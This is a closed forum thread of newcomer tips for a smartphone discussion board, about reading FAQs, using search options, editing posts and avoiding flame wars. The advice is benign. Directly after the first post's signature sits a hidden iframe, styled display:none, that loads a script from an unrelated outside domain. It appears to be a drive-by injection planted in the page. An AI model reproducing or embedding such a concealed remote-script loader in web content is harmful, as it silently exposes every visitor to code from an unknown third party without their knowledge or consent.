Closed Thread

A few hints for newbies....

Being relativly new to this board myself, I would like to offer a few hints for all the newbies that have popped up now that the 7135 is available.....

Many of your questions have already been answered in the discussions on the board. Several Beta testers of the 7135 have been participating here for some time, so what is new to you may be old hat to them. You are certainly not expected to read the entire board before asking a question, but PLEASE at least read the very informative FAQ's from the 7135 FAQ forum before asking a question:

pdaPhoneHome 7135 FAQ

http://www.smartphoneforums.com/foru...hp?device=7135

AND

SmartphoneSource FAQ Archive Forum:

http://www.smartphoneforums.com/foru...s=&forumid=143

In addition, the serach function on this formum is excellent. Just enter a couple of key words that would be in your question, and you are very likly to find existing posts where it has been discussed.

If you still don't find the answer, certainly feel free to ask away. You will find the people here are very friendly and helpful. I am just offering these hints to help prevent "answer burnout" for all of the very helpful folks here. Personally, if I know the answer to a question, I'll respond about three times, but if it keeps getting asked I stop responding, since anyone can find my previous answers with just a little effort.

Alan<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

A few (more) hints for newbies

I was going to edit this post http://www.smartphonesource.com/vbul...&threadid=4868 to add a few new items of use I have learned, but the thread is closed, so I will just add them here. (Maybe a moderator will un-close it and merge the threads and re-close it for me.....) ....

1) When viewing the FAQ forums, the default view only shows posts from the last 30 days and a handful of posts that moderators have made "sticky". Many very good FAQ's were posted more then 30 days ago. At the bottom of the message list in a forum is a place you can change the default search parameters. Be sure to change "last 30 days" to "from the beginning". It won't be too many messages to wade through. The moderators do a good job of keeping the FAQ forums on topic.

2) When using the Search function, don't just enter keywords, but look at the search options as well. IMHO, The most important is the "show results as posts" instead of "show results as threads". This will help you quickly jump right to the post that has your keywords, rather then the thread which contains that message but could be hundreds (or in some cases now thousands) of messages long.

3) If you realize after posting that you have a typo or have made some other error, you can edit your own posts. Just click the edit button while viewing your post. You can even delete it if you think it was a serious error.

4) Finally, if you get angry about a post someone has made, or feel a need to be personally insulting, you might want to consider waiting a while before posting your response to think about it. We have a very friendly helpful group here, and it would be really nice if it does not digress to the level of usenet or many other bulletin boards where you need to read through dozens of flame wars to get at valuable information just because the group is growing (and yes, I am guilty of this too, and have changed my "level of intensity" in the past month or so to compensate).

Alan

MERGED BY HoTSynC MAR01-2003 1548PST